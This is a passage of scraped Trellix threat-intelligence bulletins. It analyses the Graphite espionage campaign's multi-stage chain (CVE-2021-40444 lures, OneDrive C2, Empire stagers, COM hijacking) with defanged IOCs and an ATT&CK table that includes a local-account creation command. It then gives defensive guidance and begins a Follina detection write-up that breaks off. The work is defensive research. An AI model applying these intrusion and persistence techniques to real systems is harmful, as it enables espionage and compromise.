won\u2019t execute the payload. The rest of the bytes of the task is the shellcode that will be executed. Lastly, the task files are deleted from the OneDrive after being processed.\n\n **Figure 14. Decrypted operator task**\n\nThe diagram below summarizes the flow of the Graphite malware.\n\n **Figure 15. Graphite execution diagram**\n\n#### Fourth Stage \u2013 Empire DLL Launcher Stager\n\nThe fourth stage is a dynamic library file named csiresources.dll that we were able to extract from a task from the previous stage. The file was embedded into a Graphite shellcode task used to reflectively load the executable into the memory of the process and execute it. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (DLL) (console) Intel 80386 32-bit \n---|--- \nFile name | csiresources.dll \nFile size | 111.00 KB \nCompilation time | 21/09/2021 \nMD5 | 138122869fb47e3c1a0dfe66d4736f9b \nSHA-256 | 25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n \nThe sample is a generated Empire DLL Launcher stager that will initialize and start the .NET CLR Runtime into an unmanaged process to execute a download-cradle to stage an Empire agent. With that, it is possible to run the Empire agent in a process that\u2019s not PowerShell.exe.\n\nFirst, the malware will check if the malware is executing from the explorer.exe process. If it is not, the malware will exit.\n\n **Figure 16. Process name check**\n\nNext, the malware will try to find the file \u201cEhStorShell.dll\u201d in the System32 folder and load it. With this, the malware makes sure that the original \u201cEhStorShell.dll\u201d file is loaded into the explorer.exe context.\n\n **Figure 17. Loading EhStorShell.dll library**\n\nThe previous operation is important because the follow-up malware will override the CLSID \u201c{D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D}\u201d to gain persistence in the victims\u2019 system, performing a COM Hijacking technique. The aforementioned CLSID corresponds to the \u201cEnhanced Storage Shell Extension DLL\u201d and is handled by the file \u201cEhStorShell.dll\u201d.\n\nComing up next, the malware will load, initialize and start the .NET CLR Runtime, XOR decrypt the .NET next stage payload and load it into memory. Lastly, it will execute the file using the .NET Runtime.\n\n **Figure 18. Decryption of next stage malware**\n\n#### Fifth Stage \u2013 Empire PowerShell C# Stager\n\nThe fifth stage is a .NET executable named Service.exe which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | PE32 executable for MS Windows (console) Intel 80386 32-bit \n---|--- \nFile size | 34.00 KB \nMD5 | 3b27fe7b346e3dabd08e618c9674e007 \nSHA-256 | d5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n \nThis sample is an Empire PowerShell C# Stager whose main goal is to create an instance of a PowerShell object, decrypt the embedded PowerShell script using XOR operations and decode it with Base64 before finally executing the payload with the Invoke function.\n\n **Figure 19. Fifth stage code**\n\nThe reason behind using a .NET executable to load and execute PowerShell code is to bypass security measures like AMSI, allowing execution from a process that shouldn\u2019t allow it.\n\n#### Sixth Stage \u2013 Empire HTTP PowerShell Stager\n\nThe last stage is a PowerShell script, specifically an Empire HTTP Stager, which was embedded and encrypted in the previous stage. Below you can see the identifying information of the file:\n\nFile type | Powershell script \n---|--- \nFile size | 6.00 KB \nMD5 | a81fab5cf0c2a1c66e50184c38283e0e \nSHA-256 | da5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n \nAs we mentioned earlier, this is the last stage of the multi-stage attack and is an HTTP stager highly obfuscated using the Invoke-Obfuscation script from Empire to make analysis difficult.\n\n **Figure 20. Obfuscated PowerShell script**\n\nThe main functionality of the script is to contact hxxp://wordkeyvpload[.]org/index[.]jsp to send the initial information about the system and connect to the URL hxxp://wordkeyvpload[.]org/index[.]php to download the encrypted Empire agent, decrypt it with AES-256 and execute it. \n\n#### Timeline of Events\n\nBased on all the activities monitored and analyzed, we provide the following timeline of events:\n\n **Figure 21. Timeline of the campaign**\n\n#### Targeting\n\nOne of the lure documents we mentioned before (named \u201cparliament_rew.xlsx\u201d) might have been aimed for targeting government employees.\n\nBesides targeting government entities, it appears this adversary also has its sights on the defense industry. Another document with the name \u201cMissions Budget.xlsx\u201d contained the text \u201cMilitary and civilian missions and operations\u201d and the budgets in dollars for the military operations in some countries for the years 2022 and 2023.\n\n **Figure 22. Lure document targeting the defense sector**\n\nMoreover, from our telemetry we also have observed that Poland and other Eastern European countries were of interest to the actors behind this campaign.\n\nThe complete victimology of the actors is unknown, but the lure documents we have seen show its activities are centered in specific regions and industries. Based on the names, the content of the malicious Excel files and our telemetry, targeting countries in Western Asia and Eastern Europe and the most prevalent industries are Defense and Government.\n\n#### Infrastructure\n\nThanks to the analysis of the full attack chain, two hosts related to the attack were identified. The first domain is wordkeyvpload.net which resolves to the IP 131.153.96.114, located in Serbia and registered on the 7th of July 2021 with OwnRegistrar Inc. \n\nQuerying the IP with a reverse DNS lookup tool, a PTR record was obtained resolving to the domain \u201cbwh7196.bitcoinwebhosting.net\u201d which could be an indication that the server was bought from the Bitcoin Web Hosting VPS reseller company.\n\n **Figure 23. Reverse DNS query**\n\nThe main functionality of this command-and-control server is to host the HTML exploit for CVE-2021-40444 and the CAB file containing the second stage DLL.\n\nThe second domain identified is wordkeyvpload.org which resolves to the IP 185.117.88.19, located in Sweden, and registered on the 18th of June 2021 with Namecheap Inc. Based on the operating system (Microsoft Windows Server 2008 R2), the HTTP server (Microsoft-IIS/7.5) and the open ports (1337 and 5000) it is very likely the host is running the latest version of the Empire post-exploitation framework.\n\nThe reason behind that hypothesis is that the default configuration of Empire servers uses port 1337 to host a RESTful API and port 5000 hosts a SocketIO interface to interact remotely with the server. Also, when deploying a HTTP Listener, the default value for the HTTP Server field is hardcoded to \u201cMicrosoft-IIS/7.5\u201d.\n\n **Figure 24. Local Empire server execution with default configuration**\n\nWith the aforementioned information, as well as the extraction of the command and control from the last stage of the malware, we can confirm that this host acts as an Empire server used to remotely control the agents installed in victims\u2019 machines and send commands to execute them.\n\n#### Attribution\n\nDuring the timeline of this operation there have been some political tensions around the Armenian and Azerbaijani border. Therefore, from a classic intelligence operation point of view, it would make complete sense to infiltrate and gather information to assess the risk and movements of the different parties involved. \n\nThroughout our research into the Graphite campaign, we extracted all timestamps of activity from the attackers from our telemetry and found two consistent trends. First, the activity days of the adversary are from Monday to Friday, as depicted in the image below:\n\n **Figure 25. Adversary\u2019s working days**\n\nSecond, the activity timestamps correspond to normal business hours (from 08h to 18h) in the GMT+3 time zone, which includes Moscow Time, Turkey Time, Arabia Standard Time and East Africa Time.\n\n **Figure 26. Adversary\u2019s working hours**\n\nAnother interesting discovery during the investigation was that the attackers were using the CLSID (D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D) for persistence, which matched with an ESET report in which researchers mentioned a Russian Operation targeting Eastern European countries.\n\nAnalyzing and comparing code-blocks and sequences from the graphite malware with our database of samples, we discovered overlap with samples in 2018 being attributed to APT28. We compared for example our samples towards this one: 5bb9f53636efafdd30023d44be1be55bf7c7b7d5 (sha1):\n\n **Figure 27 Code comparison of samples**\n\nWhen we zoom in on some of the functions, we observe on the left side of the below picture the graphite sample and on the right the forementioned 2018 sample. With almost three years in time difference, it makes sense that code is changed, but still it looks like the programmer was happy with some of the previous functions:\n\n **Figure 28 Similar function flow**\n\nAlthough we mentioned some tactics, techniques and procedures (TTPs) of the actors behind this campaign, we simply do not have enough context, similarities or overlap to point us with low/moderate confidence towards APT28, let alone a nation-state sponsor. However, we believe we are dealing with a skilled actor based on how the infrastructure, malware coding and operation was setup. \n\n#### Conclusion\n\nThe analysis of the campaign described in this blog post allowed us to gather insights into a multi-staged attack performed in early October, leveraging the MSHTML remote code execution vulnerability (CVE-2021-40444) to target countries in Eastern Europe. \n\nAs seen in the analysis of the Graphite malware, one quite innovative functionality is the use of the OneDrive service as a Command and Control through querying the Microsoft Graph API with a hardcoded token in the malware. This type of communication allows the malware to go unnoticed in the victims\u2019 systems since it will only connect to legitimate Microsoft domains and won\u2019t show any suspicious network traffic.\n\nThanks to the analysis of the full attack process, we were able to identify new infrastructure acting as command and control from the actors and the final payload, which is an agent from the post-exploitation framework Empire. All the above allowed us to construct a timeline of the activity observed in the campaign.\n\nThe actors behind the attack seem very advanced based on the targeting, the malware and the infrastructure used in the operation, so we presume that the main goal of this campaign is espionage. With a low and moderate confidence, we believe this operation was executed by APT28. To further investigate, we provided some tactics, techniques and procedures (TTPs), indicators on the infrastructure, targeting and capabilities to detect this campaign.\n\n#### MITRE ATT&amp;CK Techniques\n\nTactic | Technique ID | Technique Title | Observable | IOCs \n---|---|---|---|--- \nResource Development | T1583.001 | Acquire Infrastructure: Domains | Attackers purchased domains to be used as a command and control. | wordkeyvpload[.]net \nwordkeyvpload[.]org \nResource Development | T1587.001 | Develop capabilities: Malware | Attackers built malicious components to conduct their attack. | Graphite malware \nResource Development | T1588.002 | Develop capabilities: Tool | Attackers employed red teaming tools to conduct their attack. | Empire \nInitial Access | T1566.001 | Phishing: Spear phishing Attachment | Adversaries sent spear phishing emails with a malicious attachment to gain access to victim systems. | BM-D(2021)0247.xlsx \nExecution | T1203 | Exploitation for Client Execution | Adversaries exploited a vulnerability in Microsoft Office to execute code. | CVE-2021-40444 \nExecution | T1059.001 | Command and Scripting Interpreter: PowerShell | Adversaries abused PowerShell for execution of the Empire stager. | Empire Powershell stager \nPersistence | T1546.015 | Event Triggered Execution: Component Object Model Hijacking | Adversaries established persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. | CLSID: D9144DCD-E998-4ECA-AB6A-DCD83CCBA16D \nPersistence | T1136.001 | Create Account: Local Account | Adversaries created a local account to maintain access to victim systems. | net user /add user1 \nDefense Evasion | T1620 | Reflective Code Loading | Adversaries reflectively loaded code into a process to conceal the execution of malicious payloads. | Empire DLL Launcher stager \nCommand and Control | T1104 | Multi-Stage Channels | Adversaries created multiple stages to obfuscate the command-and-control channel and to make detection more difficult. | Use of different Empire stagers \nCommand and Control | T1102.002 | Web Service: Bidirectional Communication | Adversaries used an existing, legitimate external Web service as a means for sending commands to and receiving output from a compromised system over the Web service channel. | Microsoft OneDrive \nEmpire Server \nCommand and Control | T1573.001 | Encrypted Channel: Symmetric Cryptography | Adversaries employed a known symmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. | AES 256 \nCommand and Control | T1573.002 | Encrypted Channel: Asymmetric Cryptography | Adversaries employed a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. | RSA \n \n#### Indicators of Compromise (IOCs)\n\n##### First stage \u2013 Excel Downloaders\n\n40d56f10a54bd8031191638e7df74753315e76f198192b6e3965d182136fc2fa \nf007020c74daa0645b181b7b604181613b68d195bd585afd71c3cd5160fb8fc4 \n7bd11553409d635fe8ad72c5d1c56f77b6be55f1ace4f77f42f6bfb4408f4b3a \n9052568af4c2e9935c837c9bdcffc79183862df083b58aae167a480bd3892ad0 \n\n\n##### Second stage \u2013 Downloader DLL\n\n1ee602e9b6e4e58dfff0fb8606a41336723169f8d6b4b1b433372bf6573baf40 \n\n\n##### Third stage \u2013 Graphite\n\n35f2a4d11264e7729eaf7a7e002de0799d0981057187793c0ba93f636126135f \nf229a8eb6f5285a1762677c38175c71dead77768f6f5a6ebc320679068293231 \n\n\n##### Fourth stage \u2013 DLL Launcher Stager\n\n25765faedcfee59ce3f5eb3540d70f99f124af4942f24f0666c1374b01b24bd9 \n\n\n##### Fifth stage \u2013 PowerShell C# Stager\n\nd5c81423a856e68ad5edaf410c5dfed783a0ea4770dbc8fb4943406c316a4317 \n\n\n##### Sixth stage \u2013 Empire HTTP Powershell Stager\n\nda5a03bd74a271e4c5ef75ccdd065afe9bd1af749dbcff36ec7ce58bf7a7db37 \n\n\n##### URLs\n\nhxxps://wordkeyvpload[.]net/keys/Missions Budget Lb.xls \nhxxps://wordkeyvpload[.]net/keys/parliament_rew.xls \nhxxps://wordkeyvpload[.]net/keys/Missions Budget.xls \nhxxps://wordkeyvpload[.]net/keys/TR_comparison.xls \n\n\nhxxps://wordkeyvpload[.]net/keys/JjnJq3.html \nhxxps://wordkeyvpload[.]net/keys/iz7hfD.html \nhxxps://wordkeyvpload[.]net/keys/Ari2Rc.html \nhxxps://wordkeyvpload[.]net/keys/OD4cNq.html \n\n\nhxxps://wordkeyvpload[.]net/keys/0YOL4.cab \nhxxps://wordkeyvpload[.]net/keys/whmel.cab \nhxxps://wordkeyvpload[.]net/keys/UdOpQ.cab \nhxxps://wordkeyvpload[.]net/keys/D9V5E.cab \n\n\nhxxps://wordkeyvpload[.]net/keys/update.dat \n\n\nhxxps://wordkeyvpload[.]org/index.jsp \nhxxps://wordkeyvpload[.]org/index.php \nhxxps://wordkeyvpload[.]org/news.php \nhxxps://wordkeyvpload[.]org/admin/get.php \nhxxps://wordkeyvpload[.]org/login/process.php \n\n\n##### Domains\n\nwordkeyvpload[.]net \nwordkeyvpload[.]org \njimbeam[.]live \n\n\n##### IPs\n\n131.153.96[.]114 \n185.117.88[.]19 \n94.140.112[.]178 \n\n", "cvss3": {}, "published": "2022-01-25T00:00:00", "type": "trellix", "title": "Prime Minister\u2019s Office Compromised: Details of Recent Espionage Campaign", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-01-25T00:00:00", "id": "TRELLIX:6949BCDE9887B6759BD81365E21DD71C", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/prime-ministers-office-compromised.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-06-20T00:00:00", "description": "\n\n# Trellix Global Defenders: Defending against Cyber Espionage Campaigns \u2013 Operation Graphite\n\nBy Ben Marandel, **Arnab Roy** \u00b7 June 20, 2022\n\nCyber Espionage campaigns by nature are targeted attacks that can go undetected for prolonged periods of time. Cyber Espionage campaigns often involve adversaries with clear objectives with capabilities to avoid defenses and leverage trusted enterprise IT systems or operational weaknesses within organisations. Some of the key targets for espionage campaigns are as follows:\n\n Figure 1: Cyber Espionage Key Targets \n\n\nThe ultimate goal of most cyber espionage campaigns are data exfiltration and wide spread reconasaince.\n\n## Operation graphite introduction \n\nTrellix Advanced Threat Research team released threat research on the 25th of January 2022 which highlighted discovery of a new espionage campaign targeting high-ranking government officials Western Asia and Eastern Europe. The attack is believed to have been triggered via targeted phishing with malicious macro enabled word document used to establish the initial access. Once executed the malicious document leveraged a vulnerability in Excel (CVE2021-40444) which allows remote code execution on the impacted endpoint. Similar to other espionage campaigns their was hands on recon of the targeted organization, specifically looking for documents with specific keywords of interest. This was followed by multi-stage attack which included lateral movement to other systems of interest such as domain controllers and file servers. The following figure shows the attack progression:\n\n Figure 2: Attack Chain \n\n\nLike most multi-stage attacks a combination of exploitation techniques are observed such as use of LolBas/LolBins like Powershell and exploitation of enterprise architecture and system vulnerabilities.\n\nDuring our analysis of the overall flow of the attack and the related payloads the following attributes of the attack stood out that could be critical at detecting/preventing this threat:\n\n 1. Use of OneDrive as a command a control server as well as for storing payload configuration and staging. Their is evidence that the OneDrive Implant module of the empire framework was used by the threat actor which has been documented by the [empire framework maintainers](<https://www.bc-security.org/post/using-the-onedrive-listener-in-empire-3-1-3/>). This was used specifically to subvert network security controls and hide traffic inside legitimate applications. \n 2. Use of embedded XLS into XLSX to bypass macro execution protection added in Office Excel. The XLS file is used as a secondary payload which is exploiting the CVE-2021-40444, this is not the first file to be open by the victim. To maximize the chances of execution of the exploitable XLS document the attacker uses dynamic loading of the office ribbon and custom options in the office toolbar by using a XLSM file, this XLSM file then dynamically loads the XLS file which triggers the execution of CVE-2021-40444.\n\nBased on the observed TTP\u2019s and operational similarity Trellix Threat research team was moderately confident that this attack could be attributed to APT 28.\n\n## Defensive architecture guidance\n\nThe question is how do we protect ourselves from such attacks? At the heart of the answer is building an effective threat model for cyber espionage campaigns and then driving your defensive strategy based on \u201cthink red - act blue mindset\u201d where the threat informed layered defensive strategy drives how the security controls are configured to provide a resilient defensive architecture. Below is how the Trellix XDR solution architecture protects and detects this attack.\n\n Figure 3: Trellix Solution Architecture \n\n\nOrganizations can build an effective threat model based on adversary characteristics some of which is very well documented within the MITRE ATT&amp;CK framework. Leveraging tools like MITRE ATT&amp;CK navigator is one of the methods where you can combine multiple threat actor TTP\u2019s and create an effective threat model for your SOC, an example below for TTP\u2019s used by APT 28:\n\n**Common techniques used for Cyber Espionage - using ATT&amp;CK**\n\n Figure 4: MITRE ATT&amp;CK Navigator for APT28 \n\n\nHowever, for customers who have Trellix Insights this process is even simpler: By filtering the Profiles to APT28, you will get a complete overview of the APT28 Group activities. As an introduction the tool will give you a short description of the group and their current targeted countries / sectors. \n\n Figure 5: APT28 Group Overview from MVISION Insights \n\n\nJust after this introduction, you will get overview of the 42+ campaign currently observed by the Trellix Labs. This view also indicates which endpoints within your organization may have insufficient coverage to protect themselves. By clicking on the name of the campaign, you will pivot to the full details of the selected campaign.\n\n Figure 6: Examples of APT28 related campaigns from MVISION Insights \n\n\nThe third section of the interface, describes the MITRE Techniques of Tools used by APT28 group. Once C2 communications is established, researchers established the use of \u201cFiles and Directory Discovery \u2013 T1083\u201d technique for Discovery and \u201cData Transfer Size Limits \u2013 T1030\u201d technique for Exfiltration.\n\nThis group also uses tools such as Mimikatz to simplify Credential Access via LSASS Memory \u2013 T1003.001, Certutil to download third-party tools or X-Tunnel for Exfiltration over Asymmetric Encrypted Non-C2 Protocols \u2013 T1048.002. \n\n Figure 7: MITRE Techniques used by the APT28 Group from MVISION Insights \n\n\nAnd finally, based on all those information, the interface builds for you the powerful ATT&amp;CK Matrix with a clear representation of the observed techniques.\n\n Figure 8: APT28 Group MITRE ATT&amp;CK matrix from MVISION Insights \n\n\n**Endpoint Protection Actions:** Trellix Endpoint uses exploit prevention to block execution of CVE-2021-40444 as well as use behavioral threat protection via Adaptive Threat Prevention module. Specifically, Advanced Behavior Blocking (ABB) rules stop the execution of child processes from office processes thus breaking the kill chain early in the attack lifecycle. The following rules in Trellix ENS Exploit Prevention and Adaptive Threat Protection (ATP) are recommended to observe or block behavioral activity associated with exploitation techniques.\n\n**ENS Exploit Prevention Signature 6163:** T1055: Suspicious Behavior: Malicious Shell Injection Detected\n\n**ENS Exploit Prevention Signature 6115:** T1055: Fileless Threat: Reflective DLL Remote Injection\n\n**ENS ATP Rule 300:** T1566: Prevent office applications from launching child processes that can execute script commands \n\nTo complement protection capabilities, Trellix EDR solution detects and visualizes the attack chain, as illustrated bellow at the \u201cInitial Access\u201d when the victim is opening for the first time the specifically crafted XLSX file.\n\nIn this screenshot of a demo sample illustrating Office Excel, you can observe the download of the XLS file natively through an HTTPS connection, after it has opened the XLSX file.\n\n Figure 9: Excel.exe opening an XLSX file and then downloading an XLS file, captured by MVISION EDR \n\n\n**Preventing Data Exfiltration:** Preventing the attempts to exfiltrate data can defeat this type of attack at an early stage. The threat actor uses two key techniques for data exfiltration: exfiltration over existing network protocols and endpoint data reconnaissance techniques. The exfiltration over the existing network protocol leverages the Microsoft Graph API utilized by O365 suite of apps to communicate between various O365 services. The graph API has been a target of previous APT campaigns as it provides a unique insight into existing enterprise data sitting inside O365. One of the key ways this attack can be completely defeated is by ensuring users cannot login to non-sanctioned O365 tenants. This is possible by leveraging a URL content proxy that inspects the O365 instance id in the login URL of the tenant and subsequent communication. The proxy can be configured to only allow the organizational tenant id of the enterprise O365 instance and not that of other O365 tenants. This will prevent the threat actor from succeeding in establishing the initial command and control connection as well as data exfiltration. Deploying endpoint DLP is the second critical factor in preventing the data exfiltration of sensitive information leaving organizational perimeter. This includes getting visibility into endpoint processes accessing sensitive/tagged data.\n\n**Bringing Visibility into the SOC with XDR:** Detecting multi-vector telemetry requires context and correlation across multiple data sources so that the right alerts and telemetry is presented to the SOC analyst for effective triage, scoping of the threat and effective incident response.\n\n Figure 10: Example XDR Correlation with multi-vector sensor telemetry from Threat Intelligence, Endpoint, DLP \n\n\n**Integrated sandbox for malware analysis:** As part of the Trellix solution architecture, the endpoints are capable of sending files dynamically or through integrated SOAR workflows to the Trellix Detection on Demand Cloud Sandbox. A quick analysis of the XLSX document reveals that pseudo data was used entice the end user into opening the document.\n\n Figure 11: Trellix DOD Analysis \n\n\n## Summary\n\nDefeating a multi-stage cyberespionage campaign requires a multipronged defensive strategy that starts by building an effective threat model leading to prioritization and deployment of highest impact preventive controls which leads to a security model that stalls the attackers progress and delivering enterprise resilience to cyberespionage campaigns. Some of the key steps in building such resilience is as follows:\n\n Figure 12: Cyber Espionage Playbook \n\n\nFor additional details and understanding, you can view our Threat Center webinar with Trellix Solution Architects explaining how we defend against this attack [here](<https://www.mcafee.com/enterprise/en-us/forms/gated-form.html?docID=video-6305609522112&eid=P5SWSAQK>).\n", "cvss3": {}, "published": "2022-06-20T00:00:00", "type": "trellix", "title": "Trellix Global Defenders: Defending against Cyber Espionage Campaigns \u2013 Operation Graphite", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-40444"], "modified": "2022-06-20T00:00:00", "id": "TRELLIX:0BACBA94111E0C364A9A1CCD8BD263DE", "href": "https://www.trellix.com/content/mainsite/en-us/about/newsroom/stories/research/defending-against-cyber-espionage-campaigns-operation-graphite.html", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-07-19T00:00:00", "description": "# Countering Follina Attack (CVE- 2022-30190) with Trellix Network Security Platform\u2019s Advanced Detection Features\n\nBy Vinay Kumar and Chintan Shah \u00b7 July 19, 2022\n\n## Executive summary\n\nDuring the end of May 2022, independent security researcher reported a vulnerability (assigned CVE-2022-30190) in Microsoft Support Diagnostic Tool (MSDT), which could be exploited to execute arbitrary code when MSDT is called using URI protocol. The URI protocol **ms-msdt:/** could also be invoked from the malicious word document, which when opened by the victim, would allow malicious code to execute on the target machine with the privileges of the calling application. In response to the reported vulnerability, Microsoft released [the advisory and guidance](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) on disabling the MSDT URI protocol. Subsequently, the vulnerability, was patched in the [June security updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) released by Microsoft. Since then, this vulnerability has been found to be exploited by multiple state actors in [targeted attack campaigns](<https://www.bleepingcomputer.com/news/security/windows-msdt-zero-day-now-exploited-by-chinese-apt-hackers/>).\n\nAt Trellix, we are committed to protecting our customers from upcoming and emerging threats on the network inclusive of those that are found being exploited in the wild. Trellix Network Security Platform\u2019s (Trellix NSP) Intrusion Prevention Research Team strives to build advanced detection features , improving product\u2019s overall Threat Detection capabilities.\n\nOver the next few sections of this blog, we will highlight couple of advanced detection features in Trellix NSP, which helps in protecting the customers against this and future attacks of similar nature.\n\n## Introduction \n\nMS Word document exploiting Microsoft Support Diagnostic Tool vulnerability ( CVE- 2022-30190 ) was first found to be [submitted to VT](<https://www.virustotal.com/gui/file/4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784/>) on 27th May 2022 from Belarus with the file name **05-2022-0438.doc**. However, the number 0438 turns out to be the Area code of the region **Follina** in Italy and hence the name. Exploit document is not found to be connected to Italy in any way.\n\n Figure 1: Sample submission history on VirusTotal \n\n\nThere is no dearth of instances where one of the MS Office\u2019s core features, Object Linking and Embedding ( OLE ) have been abused as an initial attack vector and CVE-2022-30190 was no different. This was yet another classic example of chaining OLE with another logic flaw to achieve arbitrary code execution on the target machine. Traditionally, Object Linking and Embedding had significantly contributed to building weaponized office exploits, and we believe this will continue to happen. As with previous CVE-2021-40444 and many other exploits, OLE was found to be used for linking the document to the externally hosted object, in this case, html file. \n\n[MS Office Open XML specifications](<https://www.ecma-international.org/publications-and-standards/standards/ecma-376/>) mentions that an Office Open XML document facilitates embedding objects or link to external objects which can be specified via relationships. Any embedded or linked object specified in the container application ( OOXML document in this case ) must be identified by its unique **ProgID** string. As per the specifications, this string must be used to determine the type and the application used to load the object data. An excerpt from the document specifications is as shown below:\n\n Figure 2: Specs on Embedded objects \n\n\nAs documented in the [ISO-29500-4 specifications](<https://standards.iso.org/ittf/PubliclyAvailableStandards/c071692_ISO_IEC_29500-4_2016.zip>) ST_OLEType defines the type of the OLE object in **document.xml**, either linked or embedded and the **ProgID=\u201dhtmlfile\u201d** indicates the type of linked object data. As shown in the CVE-2022-30190 exploit document below, **document.xml.rels** file with Type attribute specifying relationship as \u201coleObject\u201d, **Target** attribute set to the OLE object link and **TargetMode** set as external. This allows the crafted document to link to the externally hosted potentially malicious object and invoke the respective protocol handlers for rendering the object which could lead to the exploitation of potential logic flaws in object renderers.\n\n Figure 3: Structure of exploit document \n\n\nAs we notice the document.xml.rels file, it contains an external reference to the malicious domain for retrieving the html file :\n\n**hxxps://www.xmlformats.com/office/word/2022/wordprocessingDrawing/RDF842l.html!**. Hosted html file on this domain contains script block with commented lines. This is required for making the HTML file sufficiently sized ( precisely greater than 4KB ) to be able to get it processed and rendered by mshtml.dll. \n\n Figure 4: downloaded html file from server \n\n\nSubsequently, script tries to invoke PCWDiagnostic package using MSDT URI protocol handler with multiple arguments out of which one argument is IT_BrowseForFile which can take embedded PowerShell script within $( ) as an argument , resulting into code execution. PowerShell script is Base64 encoded and decoded form is of the script is as shown below. \n\n Figure 5: Decoded PowerShell script \n\n\nAs we see in the decoded payload, the script is intended to run the malicious rgb.exe on the target system. Summarizing the sequence involved in the attack:\n\n * Malicious MS office document with linked object is delivered to the victim possibly, as a part of phishing campaign.\n * On clicking the document, malicious HTML script is rendered, leading to arbitrary code execution on the affected system. \n\nWindows system registers innumerable number of URI protocol handlers which could be potentially abused to exploit similar flaws. For instance, [search-ms](<https://docs.microsoft.com/en-us/windows/win32/search/getting-started-with-parameter-value-arguments>) URI protocol handler , used to query windows search indexing feature can be abused by the attackers to connect to the remote SMB share on the attacker-controlled server. However, it does not directly lead to code execution as it requires multiple levels of user interaction, but a query can be crafted to lure the users to execute legitimate looking executables as shown below. Both these of URI protocol attacks were first [reported here](<https://benjamin-altpeter.de/shell-openexternal-dangers/>).\n\n Figure 6: search-ms query to connect to remote location \n\n\n**How Trellix NSP protects against Follina**\n\nTrellix NSP has been one of the most advance and mature IPS in the security industry. Over a period, we developed some of the cutting-edge features to deal with complex attack scenarios which involved handling encoding, compressions, and complex file formats. **Microsoft Office Deep File Inspection** and **Multi Attack ID Correlation** being some of these. We use combination of these advance capabilities to detect entire attack cycle. In the following sections, we will try to understand how Trellix Network Security Platform\u2019s advanced inspection capabilities highlighted above can help correlate multiple low or medium severity events to detect phases in the attack cycle, thereby raising overall confidence level.\n\n**Microsoft Open Office XML(OOXML) file format**\n\nOLE File format which was traditionally used in Microsoft office is replaced with Office open xml. Office Open XML (OOXML) is a zipped, XML-based file format developed by Microsoft for representing spreadsheets, charts, presentations, and word processing documents. In a nutshell this means that the whole document is contained in a zip package. Multiple files and directories together form the document. There are directories like _[Content_Types].xml , _rels, docProps_, which are basic part of all office zip packages, and then there is a directory specific to document type _(word directory for docx, xl and ppt directory for xlsx and pptx respectively)_. For each of the document type the specific directory would contain different files limited to the type. Like in case of a docx type, the \u2018word\u2019 directory contains document.xml file which has the core content of the document. Here is a brief overview about important files under these directories: \n\n**[Content_Types].xml** \nThis file contains the MIME type information for parts of the package. It uses defaults for certain file extensions and overrides for parts specified by Internationalized Resource Identifier.\n\n**_rels** \nThis directory contains the relationship information for files within the package.\n\n**_rels/.rels** \nThis is the location where applications look first to find the package relationships.\n\n**docProps/core.xml** \nThis file contains the core properties for any Office Open XML document.\n\n**word/document.xml** \nThis file is the main part for any Word document.\n\nZip file format specification specifies that a file in the zip archive is stored in a file record structure. For each file in the zip archive, there is a corresponding entry of this structure. \n\n[local file header 1] \n[file data 1] \n[data descriptor 1] \n. \n. \n. \n[local file header n] \n[file data n] \n[data descriptor n] \n \n[archive decryption header] \n[archive extra data record] \n[central directory header 1] \n. \n. \n. \n[central directory header n] \n[zip64 end of central directory record] \n[zip64 end of central directory locator] \n[end of central directory record]\n\nThese structures are placed one after another, structure starts with local file header followed by optional Extra Data Fields and file data (optionally compressed/optionally encrypted). Local header contains details about the file data, encryption/compression mechanism along with filename, file size and few more things.\n\n**Local file header**\n\nOffset | Byte | Description \n---|---|--- \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n8 | 2 | Compression method \n10 | 2 | File last modification time \n12 | 2 | File last modification date \n14 | 4 | CRC-32 \n18 | 4 | Compressed size \n22 | 4 | Uncompressed size \n26 | 2 | File name length (n) \n28 | 2 | Extra field length (m) \n30 | n | File Name \n30+n | m | Extra Field \n0 | 4 | Local file header signature # 0x04034b50 (read as a little-endian number) \n4 | 2 | Version needed to extract (minimum) \n6 | 2 | General purpose bit flag \n \n \n\n\nFor Microsoft documents, deflate compression is used commonly. In a nutshell, the files which constitutes the document are stored in possibly encrypted/compressed format inside the zip package. In the figure below, we dissect this structure for document.xml file present under word directory with a hex editor (010 editor) with zip parsing capabilities which will help us to investigate the details \u2013\n\n Figure 7: Structure for document.xml \n\n\n**Need for deep file inspection**\n\nWe have seen in the past that different vulnerabilities may require the IPS devices to examine the content of the different files present inside zip package. Same is the case with Follina. As explained earlier, this vulnerability abuses Microsoft OOXML **Object Linking and Embedding** functionality linking a file to external resource via the relationship file to load malicious content. Hence it requires the detection device to check the external references used in word/rels/document.xml.rels file. \n\n Figure 8: Structure of document.xml.rels \n\n\nSince this file is present, as a compressed entity in the zip archive, a meaningful detection with IPS cannot be done until the file is decompressed. With NSP\u2019s unique in industry capability, known as Deep File inspection, this is possible. \n\nThis is implemented using protocol parsing capability of the NSP. The local file header structure for the specific file is parsed and the compressed data of the file is decoded. This feature can be used by enabling it from the inspection option policy.\n\n Figure 9: Policy configuration to enable MS Office Deep File Inspection \n\n\n_For more details, please refer to NSP documentation_\n\n**Some of the key highlights: deep file inspection **\n\n * This feature helps to decompress the file contents inline; the complete file is not required to be downloaded for inspection \n * It also gives the flexibility to decompress only the content of a selected file (individual file present inside zip achieve), 